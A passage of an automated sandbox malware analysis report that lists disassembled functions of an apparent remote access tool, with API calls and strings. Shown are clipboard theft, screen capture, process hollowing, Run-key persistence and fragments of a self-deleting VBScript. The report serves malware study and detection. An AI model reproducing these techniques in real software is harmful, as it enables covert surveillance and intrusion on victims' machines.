Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32(0000000D), ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D

Strings

lJD, xrefs: 00451FA0

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Uniqueness

Uniqueness Score: -1.00%

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Uniqueness

Uniqueness Score: -1.00%

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Uniqueness

Uniqueness Score: -1.00%

Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Uniqueness

Uniqueness Score: -1.00%

Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Uniqueness

Uniqueness Score: -1.00%

Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetIconInfo.USER32(?,?), ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwMapViewOfSection, xrefs: 0041813B
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168
ZwCreateSection, xrefs: 0041811C
ZwClose, xrefs: 00418163
ZwUnmapViewOfSection, xrefs: 0041814F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
while fso.FileExists(", xrefs: 0040D5EC
""", 0, xrefs: 0040D6E7
On Error Resume Next, xrefs: 0040D5B9
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
wend, xrefs: 0040D689
\update.vbs, xrefs: 0040D57B
open, xrefs: 0040D7BE
0qF, xrefs: 0040D78C, 0040D797
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
Temp, xrefs: 0040D580
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
exepath, xrefs: 0040D4F7
fso.DeleteFolder ", xrefs: 0040D6AB
8SG, xrefs: 0040D4CF
dMG, xrefs: 0040D45B
fso.DeleteFile ", xrefs: 0040D63A
"), xrefs: 0040D5D5
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

8SG, xrefs: 0040D15E
.vbs, xrefs: 0040D201
while fso.FileExists(", xrefs: 0040D2C8
pth_unenc, xrefs: 0040D09C
On Error Resume Next, xrefs: 0040D294
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
wend, xrefs: 0040D364
hpF, xrefs: 0040D38F
dMG, xrefs: 0040D0D1
open, xrefs: 0040D40C
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
Temp, xrefs: 0040D246
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
exepath, xrefs: 0040D181
fso.DeleteFolder ", xrefs: 0040D38A
fso.DeleteFile ", xrefs: 0040D315
"), xrefs: 0040D2B1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32(?,.exe), ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

open, xrefs: 0041263B
temp_, xrefs: 004125E3
WDH, xrefs: 00412548, 004126B6
exepath, xrefs: 004124CC
8SG, xrefs: 004124A6
.exe, xrefs: 004125F5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

alias audio, xrefs: 0041B0B8
resume audio, xrefs: 0041B1E2
status audio mode, xrefs: 0041B1F7
